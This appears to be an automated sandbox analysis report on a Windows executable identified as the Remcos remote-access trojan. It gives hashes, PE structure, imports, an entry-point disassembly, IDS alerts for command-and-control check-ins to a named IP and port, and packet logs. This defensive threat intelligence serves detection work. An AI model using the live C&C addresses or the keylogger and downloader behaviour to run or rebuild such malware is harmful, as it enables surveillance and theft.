                                              Preview: * REMCOS v2.0.4 Pro.. * Breaking-Security.Net....11:57:37:056 [INFO] Offline Keylogger Started..11:57:37:087 [INFO] Initializing connection to C&C.....11:57:47:143 [INFO] Connected to C&C!..12:28:50:434 [INFO] Disconnected. Retrying connection.....12:36:11:159 [INFO] Connected to C&C!..13:15:50:728 [INFO] Disconnected. Retrying connection.....13:30:20:209 [INFO] Connected to C&C!..05:44:58:323 [INFO] Disconnected. Retrying connection.....22:47:13:241 [INFO] Connected to C&C!..05:06:18:925 [INFO] Disconnected. Retrying connection.....21:11:24:769 [INFO] Connected to C&C!..17:59:38:499 [INFO] Disconnected. Retrying connection.....13:41:04:354 [INFO] Connected to C&C!..22:52:30:936 [INFO] Disconnected. Retrying connection.....22:17:49:773 [INFO] Connected to C&C!..15:46:52:751 [INFO] Disconnected. Retrying connection.....00:17:28:212 [INFO] Connected to C&C!..11:29:01:652 [INFO] Disconnected. Retrying connection.....01:08:51:657 [INFO] Connected to C&C!..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.600373214988344
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.66%
                                              • Win32 Executable Delphi generic (14689/80) 0.15%
                                              • Windows Screen Saver (13104/52) 0.13%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              File name:file.exe
                                              File size:917'504 bytes
                                              MD5:21d13f2f3c4db8f083b672d81831fa5e
                                              SHA1:b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0
                                              SHA256:17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3
                                              SHA512:005658047ae5bd43d2c709c640ffd60b17a3e551657502804dbfd288193b340834e74b6a007731f401d4fc62b76cbafde40e5a30b08f9fb00f9506b6438c470d
                                              SSDEEP:12288:ZWBoBYd39letTbwm3Undsb+gfrEJLzDQ2bALSKLmDt8N90il5HyV/e4:ZeR9ItXwdnWbLrEJJrta5Hah
                                              TLSH:1215AE23BAB1A432D153253A9D475378DC28BE206E28B4D36FE93D4DEB743823417697
                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                              Icon Hash:3c258c0d8d4d597d
                                              Entrypoint:0x4664d8
                                              Entrypoint Section:CODE
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                              DLL Characteristics:
                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:971f4f781c7818935ec7bc047c34d2d1
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              add esp, FFFFFFF0h
                                              push ebx
                                              mov eax, 004662D8h
                                              call 00007F6A04B21DFCh
                                              mov ebx, dword ptr [00468124h]
                                              nop
                                              mov eax, dword ptr [ebx]
                                              call 00007F6A04B71F4Ah
                                              mov ecx, dword ptr [00468210h]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045DC04h]
                                              call 00007F6A04B71F4Fh
                                              mov ecx, dword ptr [00467EF0h]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045BE40h]
                                              call 00007F6A04B71F3Ch
                                              mov ecx, dword ptr [00467ECCh]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045D884h]
                                              call 00007F6A04B71F29h
                                              mov eax, dword ptr [ebx]
                                              mov byte ptr [eax+5Bh], 00000000h
                                              mov eax, dword ptr [ebx]
                                              call 00007F6A04B71F9Ch
                                              pop ebx
                                              call 00007F6A04B1FA96h
                                              nop
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a000 | 0x241a | .idata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x77000 | 0x6f4a8 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6f000 | 0x73c4 | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x6e000 | 0x18 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               CODE | 0x1000 | 0x66000 | 0x65600 | f01613af568619cd0ae79db7ea53d20a | False | 0.5205162415228114 | data | 6.539199210909358 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               DATA | 0x67000 | 0x2000 | 0x1400 | c2972fc1c7eecd2e501b2af2d8a69a98 | False | 0.419921875 | data | 3.883484059034863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               BSS | 0x69000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .idata | 0x6a000 | 0x3000 | 0x2600 | df8220a7bd3f2a14fe3ef1aba1f3f5f6 | False | 0.3514597039473684 | data | 4.88778235147272 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .tls | 0x6d000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .rdata | 0x6e000 | 0x1000 | 0x200 | 8f8bc12ba7b86dfde1ceac0574e3d88c | False | 0.048828125 | data | 0.2005819074398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                               .reloc | 0x6f000 | 0x8000 | 0x7400 | 29785f36ddd05cc45948468ea58523e8 | False | 0.6173221982758621 | data | 6.676272701274689 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                               .rsrc | 0x77000 | 0x70000 | 0x6f600 | 7c79695184c9941d63432580bf267c8c | False | 0.4435106271043771 | data | 5.58402275238853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x77894 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" |  |  | 0.38636363636363635
RT_CURSOR | 0x779c8 | 0x134 | data |  |  | 0.4642857142857143
RT_CURSOR | 0x77afc | 0x134 | data |  |  | 0.4805194805194805
RT_CURSOR | 0x77c30 | 0x134 | data |  |  | 0.38311688311688313
RT_CURSOR | 0x77d64 | 0x134 | data |  |  | 0.36038961038961037
RT_CURSOR | 0x77e98 | 0x134 | data |  |  | 0.4090909090909091
RT_CURSOR | 0x77fcc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" |  |  | 0.4967532467532468
RT_ICON | 0x78100 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Russian | Russia | 0.08661825726141079
RT_STRING | 0x7a6a8 | 0xac | data |  |  | 0.5872093023255814
RT_STRING | 0x7a754 | 0x1cc | data |  |  | 0.40217391304347827
RT_STRING | 0x7a920 | 0x188 | data |  |  | 0.5025510204081632
RT_STRING | 0x7aaa8 | 0x1b0 | data |  |  | 0.5
RT_STRING | 0x7ac58 | 0x324 | data |  |  | 0.44154228855721395
RT_STRING | 0x7af7c | 0xd8 | data |  |  | 0.5879629629629629
RT_STRING | 0x7b054 | 0x118 | data |  |  | 0.5678571428571428
RT_STRING | 0x7b16c | 0x298 | data |  |  | 0.46686746987951805
RT_STRING | 0x7b404 | 0x3f8 | data |  |  | 0.3700787401574803
RT_STRING | 0x7b7fc | 0x35c | data |  |  | 0.38953488372093026
RT_STRING | 0x7bb58 | 0x3e8 | data |  |  | 0.33
RT_STRING | 0x7bf40 | 0x234 | data |  |  | 0.475177304964539
RT_STRING | 0x7c174 | 0xec | data |  |  | 0.5508474576271186
RT_STRING | 0x7c260 | 0x1b4 | data |  |  | 0.5206422018348624
RT_STRING | 0x7c414 | 0x3e4 | data |  |  | 0.32028112449799195
RT_STRING | 0x7c7f8 | 0x358 | data |  |  | 0.4158878504672897
RT_STRING | 0x7cb50 | 0x2b4 | data |  |  | 0.4060693641618497
RT_RCDATA | 0x7ce04 | 0x61e9b | ASCII text, with very long lines (65536), with no line terminators |  |  | 0.47509917691266196
RT_RCDATA | 0xdeca0 | 0x9 | ASCII text, with no line terminators |  |  | 1.6666666666666667
RT_RCDATA | 0xdecac | 0x6a68 | Delphi compiled form 'T__3389240238' |  |  | 0.14915565345080764
RT_RCDATA | 0xe5714 | 0x2a4 | Delphi compiled form 'T__3390423973' |  |  | 0.7144970414201184
RT_RCDATA | 0xe59b8 | 0x2db | Delphi compiled form 'T__3390464134' |  |  | 0.6580027359781122
RT_GROUP_CURSOR | 0xe5c94 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0xe5ca8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0xe5cbc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xe5cd0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xe5ce4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xe5cf8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xe5d0c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_ICON | 0xe5d20 | 0x14 | data | Russian | Russia | 1.15
RT_VERSION | 0xe5d34 | 0x774 | COM executable for DOS |  |  | 0.2112159329140461
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CopyFileA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteA
URLMON.DLL | URLDownloadToFileA
shfolder.dll | SHGetFolderPathA
Language of compilation system | Country where language is spoken
Russian | Russia
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T17:57:34.496629+0100 | 2022550 | ET MALWARE Possible Malicious Macro DL EXE Feb 2016 | 1 | 192.168.2.5 | 49704 | 93.125.99.121 | 80 | TCP
2024-12-13T17:57:38.174795+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49705 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:05.189475+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49751 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:32.236209+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49815 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:59.393580+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49878 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:59:26.877943+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49942 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:59:53.972078+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49981 | 154.16.63.197 | 3360 | TCP
2024-12-13T18:00:21.020725+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49982 | 154.16.63.197 | 3360 | TCP
2024-12-13T18:01:15.096357+0100 | 2829308 | ETPRO MALWARE MSIL/Remcos Variant CnC Checkin | 1 | 192.168.2.5 | 49984 | 154.16.63.197 | 3360 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 13, 2024 17:57:35.105743885 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.105787039 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.108072042 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.108125925 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.108167887 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.108211994 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.110712051 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.110761881 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.110824108 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.110866070 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.112971067 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.113020897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.113064051 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.113105059 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.115430117 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.115475893 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.115535021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.115576029 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.117970943 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.118017912 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.118052959 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.118094921 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.120382071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.120430946 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.120452881 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.120491982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.122838974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.122889042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.122945070 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.122987986 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.125315905 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.125365973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.125407934 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.125452042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.127804995 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.127854109 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.127897024 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.127937078 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.130307913 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.130357981 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.130372047 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.130413055 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.132148027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.132191896 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.132237911 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.132277966 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.134043932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.134099007 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.134109020 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.134144068 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.135970116 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.136019945 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.136109114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.136156082 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.137871027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.137922049 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.137926102 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.137965918 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.139806032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.139856100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.139991045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.140033007 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.141684055 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.141733885 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.141788006 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.141824961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.143620968 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.143668890 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.143754959 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.143799067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.145533085 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.145581961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.145610094 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.145649910 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.147439003 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.147494078 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.147555113 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.147598028 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.149445057 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.149494886 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.149532080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.149569988 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.151340961 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.151362896 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.151386976 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.151402950 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.153279066 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.153326035 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.153331041 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.153367043 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.155229092 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.155278921 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.155324936 CET804970493.125.99.121192.168.2.5
